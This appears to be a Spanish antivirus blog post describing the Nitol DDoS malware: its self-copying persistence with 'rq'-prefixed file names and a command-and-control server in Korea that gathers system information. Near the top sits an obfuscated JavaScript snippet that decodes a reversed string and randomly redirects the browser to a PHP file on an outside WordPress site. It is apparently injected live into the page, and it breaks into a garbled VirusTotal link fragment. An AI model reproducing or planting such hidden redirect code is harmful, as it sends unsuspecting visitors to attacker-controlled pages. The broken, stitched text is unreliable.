DENEGACION DE SERVICIOS PROVOCADO POR DDOS NITOL
Se trata de un código malicioso que realiza la función de un ataque de DDoS
$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}total.com/es/file/94d46ccc43ef07f1e100bf893319ec9a925509daef36cec3279a91d13f1da186/analysis/1548772995/” target=”_blank” rel=”noopener”>El preanalisis de virustotal ofrece el siguiente informe:>
El proceso en cuestión queda residente y en cada reinicio se genera una nueva copia añadiendo al %nombre%.exe “rq”
%nombre%.exe
rq%nombre%.exe
rqrq%nombre%.exe
rqrqrq%nombre%.exe
En un PC infectado con código malicioso, el servidor de C & C captura información del sistema operativo, nombre de la computadora, información de la memoria e información del procesador.
El servidor C & C utiliza el servicio de códigos nacionales y el servicio de códigos cambia la dirección IP a la forma de dirección.
La ubicación del servidor C & C es Corea:
__________
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Los comentarios están cerrados.